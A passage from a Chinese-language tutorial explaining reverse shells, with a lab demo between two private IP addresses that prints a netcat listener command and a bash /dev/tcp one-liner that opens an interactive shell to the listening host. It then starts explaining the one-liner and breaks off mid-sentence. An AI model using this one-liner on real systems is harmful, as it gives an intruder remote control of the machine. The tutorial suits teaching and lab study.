一、什么是反向shell
就是控制端监听在某TCP/UDP端口,被控制端主动连接控制端的这一端口,控制端可以通过这一端口进行相关命令操作。像telnet,ssh这些可以理解为正向shell,控制端主动连通控制端,而反向shell则是正向shell的向。
反向shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形,同时也实现了被控端的精准控制(指定了被控制端的IP,除此之外的是无法和被控端无法连接)。
二、反向shell测试
主控端和被控信息:
控制端:10.212.52.14
被控制端:10.212.52.252
在控制端监听一个端口:nc -lvp 3000
被控制端执行如下指令:bash -i >& /dev/tcp/10.212.52.14/3000 0>&1
从上面可以看出,这里指出了被控制端的IP和端口信息。其具体实现的结果如下:
上面的数字标出了执行的顺序。最后可以看出,我们的主机已经由localhost变成了9s3s主机。接下来我们看下这个反向shell的实现过程。
1、bash -i
这个表示产生一个交互式的shell ,当然我们也可以能对方一个csh或zsh,不过交互式的参数会根据shell的不同可能有所不同。
2、/dev/tcp/ip/port
/dev/tcp/ip/port是一个特殊的文件,实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的。但是如果你在一方监听端口的情况下对这个文件进行读写&